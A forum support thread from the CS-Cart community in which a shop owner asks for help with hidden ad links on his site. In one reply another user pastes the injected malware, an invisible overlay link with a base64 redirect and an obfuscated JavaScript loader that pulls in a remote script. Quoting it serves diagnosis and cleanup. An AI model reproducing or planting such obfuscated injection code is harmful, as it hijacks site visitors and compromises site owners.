Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

Malicious Advert Link In My Pages Rate Topic   - - - - -

 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 03 April 2017 - 08:51 AM #1

Thought my site is scanned and appears clean by various scanners, I have some links to 2 ads on my pages that I dont know how got there. They are not showing on view source fo rthe page, can anyone help me how to find them and remove them. I have pasted images of the links so there are not linked.

 

first one (you can see the page it looks like it should be on, https://www.hivis.co...is-jackets.html

 

 

 

 

I did add a link for a dev to CMS magazine a while back and am unsure if this has anything to do with it

 

Thanks

John

Attached Thumbnails

  • malicious 1.JPG
  • maliscious 2.JPG

Custom printed hi visibility clothing sale the UK's online hivis safety shop
v3.06 - v4.3.6


 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3,372 posts

Posted 03 April 2017 - 10:23 AM #2

The adplexmedia is associated with your American Express/PayPal image.  I can't find the other one.

 

Edit:  It's acually an iframe not the image.  Frame info shows this link https://www.multimat...Addon.php?t=1. Here's the source.

<div id='imageSection'></div><a href='data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPndpbmRvdy5sb2NhdGlvbi5ocmVmID0gImh0dHBzOi8vYWRwbGV4bWVkaWEuYWRrMnguY29tL2ltcD9wPTc0NTk2MjM1JmN0PWh0bWwmYXA9MTMwNCI8L3NjcmlwdD4=' style='position:absolute; width:50%; height:100%; top:0; right:0; z-index:99999;' target='_blank'></a><script type="text/javascript">
function imageLoad(s){
var s1=unescape(s.substr(0,s.length-1)); var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
var code="imageLoad('*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*8J*5F%7Bfw*75fiUfwfrx*75*8I*75*%3CGu*8F*75*7%3C%3C9%3A%3E%3B785*7%3C*7H*75xn%7Fj*8F*75*7%3C855%7D7%3A5*7%3C*7H*75xjw%7Bjwitrfns*8F*75*7%3Cfiuqj%7Drjinf*7%3C*75*7H*75xjhzwj*8Fywzj*75*75*%3CI*8G*5F*8H4xhwnuy*8J*5F*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*75xwh*8I*7%3Cmyyux*8F44fiuqj%7Drjinf3fip73ht4fiuqj%7Drjinf4yflx4%7Dgfssjw4%7Dgfssjw3ox*8Kfu*8I6855*7%3C*8J*8H4xhwnuy*8J5');";
var code2="imageLoad('*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*8J*5F%7Bfw*75fiUfwfrx*75*8I*75*%3CGu*8F*75*7%3C%3C9%3A%3E%3B785*7%3C*7H*75xn%7Fj*8F*75*7%3C855%7D7%3A5*7%3C*7H*75xjw%7Bjwitrfns*8F*75*7%3Cfiuqj%7Drjinf*7%3C*75*7H*75xjhzwj*8Fywzj*75*75*%3CI*8G*5F44htrrjsy*5F*8H4xhwnuy*8J*5F*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*75xwh*8I*7%3Cmyyux*8F44fiuqj%7Drjinf3fip73ht4fiuqj%7Drjinf4yflx4%7Dgfssjw4%7Dgfssjw3ox*8Kfu*8I6855*7%3C*8J*8H4xhwnuy*8J*5F5');";
var script = document.createElement('script');
script.innerHTML=code;

var script2 = document.createElement('script');
script2.innerHTML=code2;

var des=document.getElementById('imageSection')
des.appendChild(script);
des.appendChild(script2);
</script>


 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 03 April 2017 - 01:45 PM #3

cheers Tool


Custom printed hi visibility clothing sale the UK's online hivis safety shop
v3.06 - v4.3.6


 
  • demeldoo
  • Senior Member
  • Members
  • Join Date: 27-Jul 12
  • 859 posts

Posted 03 April 2017 - 02:53 PM #4

cheers Tool

 

youi should probably contact cs cart team to inspect this



 
  • imac
  • CTO
  • CS-Cart Architects
  • Join Date: 22-Nov 05
  • 1,595 posts

Posted 04 April 2017 - 09:06 AM #5

Thought my site is scanned and appears clean by various scanners, I have some links to 2 ads on my pages that I dont know how got there. They are not showing on view source fo rthe page, can anyone help me how to find them and remove them. I have pasted images of the links so there are not linked.

 

first one (you can see the page it looks like it should be on, https://www.hivis.co...is-jackets.html

 

 

 

 

I did add a link for a dev to CMS magazine a while back and am unsure if this has anything to do with it

 

Thanks

John

 

I could not find the kuaptr.com link on your site.

If you can still see it, please contact tech support.

As possible case it could be an XSS link when you open your site page by a link from email or some forum.


Ilya Makarov,
CS-Cart Architect Team
Suggest and vote for new features | Report a bug

 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 04 April 2017 - 01:05 PM #6

I could not find the kuaptr.com link on your site.

If you can still see it, please contact tech support.

As possible case it could be an XSS link when you open your site page by a link from email or some forum.

I disabled the block for that image imac, I will contact support


Custom printed hi visibility clothing sale the UK's online hivis safety shop
v3.06 - v4.3.6


 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3,372 posts

Posted 04 April 2017 - 03:31 PM #7

John, it's not the paypal image as I re-stated in my first post.  There is something along the entire right side of your page.  I think it has something to do with the page up.?



 
  • martfox
  • Member
  • Authorized Reseller
  • Join Date: 15-Jan 10
  • 378 posts

Posted 04 April 2017 - 06:31 PM #8

Seems like a malware

 

https://malwr.com/an...DEwZjcxZTJjOTI/


CS-Cart with 1 Year FREE Web Hosting | CS-Cart optimized SSD Cloud VPS Servers from €10.00/month
.
VPS SSD Cloud from €10.00 *** Dedicated Servers *** CS-Cart Authorized Reseller and Web Hosting Provider


 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 04 April 2017 - 09:47 PM #9

John, it's not the paypal image as I re-stated in my first post.  There is something along the entire right side of your page.  I think it has something to do with the page up.?

sorry I thought you meant the amex image, Ill give it a look, cheers.

 

disabled the easy scroll do you still see it tool ?

 

JOhn


Custom printed hi visibility clothing sale the UK's online hivis safety shop
v3.06 - v4.3.6


 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3,372 posts

Posted 04 April 2017 - 10:29 PM #10

It's no longer along the entire right side but it is still at the bottom right side.  Just hover in the area and you will see it.



 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3,372 posts

Posted 04 April 2017 - 10:50 PM #11

I just discovered that it's on the bottom left too but you can only see it with the browser inspector.



 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 05 April 2017 - 08:01 AM #12

Thanks tool, 

update this morning cs support have said it has sorted it for me.

 

We have examined this issue. The malicious code was added into the js/tygh/product_image_gallery.js. We have backuped your file and uploaded the original one. Now the issue does not reproduce.

Please check it and let me know the result.

 

Next question, how did it get there, and how do I shore it up so it doesnt happen again, is it something Ive done or was it part of the image gallery addon ?

 

Ive changed all passwords etc


Custom printed hi visibility clothing sale the UK's online hivis safety shop
v3.06 - v4.3.6


 
  • martfox
  • Member
  • Authorized Reseller
  • Join Date: 15-Jan 10
  • 378 posts

Posted 05 April 2017 - 08:21 AM #13


Next question, how did it get there, and how do I shore it up so it doesnt happen again, is it something Ive done or was it part of the image gallery addon ?

 

 

Hi, you should enable mod_security on your server. It will help to block the most spammers and hackers to put some injection codes into your files, or to create new files with malicious code.


CS-Cart with 1 Year FREE Web Hosting | CS-Cart optimized SSD Cloud VPS Servers from €10.00/month
.
VPS SSD Cloud from €10.00 *** Dedicated Servers *** CS-Cart Authorized Reseller and Web Hosting Provider


 
  • imac
  • CTO
  • CS-Cart Architects
  • Join Date: 22-Nov 05
  • 1,595 posts

Posted 05 April 2017 - 08:43 AM #14

Thanks tool, 

update this morning cs support have said it has sorted it for me.

 

 

 

 

Next question, how did it get there, and how do I shore it up so it doesnt happen again, is it something Ive done or was it part of the image gallery addon ?

 

Ive changed all passwords etc

I've took a look at your server.

Looks like all js files were changes or uploaded on Nov 4, 2016. Besides as I can see permissions on these files are ok.

But I see some other suspicious files on your server like json_post.php. Also there is prepare.php, why?

So my recommendation is to clear all the odd files and after that changes all passwords once again.

Please use Changes Detector in order to make you don't have some other suspicious changes.


Ilya Makarov,
CS-Cart Architect Team
Suggest and vote for new features | Report a bug

 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 05 April 2017 - 08:54 AM #15

I've took a look at your server.

Looks like all js files were changes or uploaded on Nov 4, 2016. Besides as I can see permissions on these files are ok.

But I see some other suspicious files on your server like json_post.php. Also there is prepare.php, why?

So my recommendation is to clear all the odd files and after that changes all passwords once again.

Please use Changes Detector in order to make you don't have some other suspicious changes.

not sure about the json_post.php says wordspress info in it so I have downloaded that,

 

prepare.php is probably left over from cs v 2.12

 

There is also a file on there private.php from 20th feb 2017, looks like php test script, can this be removed

http://prntscr.com/esnnyo

 

Thanks for taking  a look


Custom printed hi visibility clothing sale the UK's online hivis safety shop
v3.06 - v4.3.6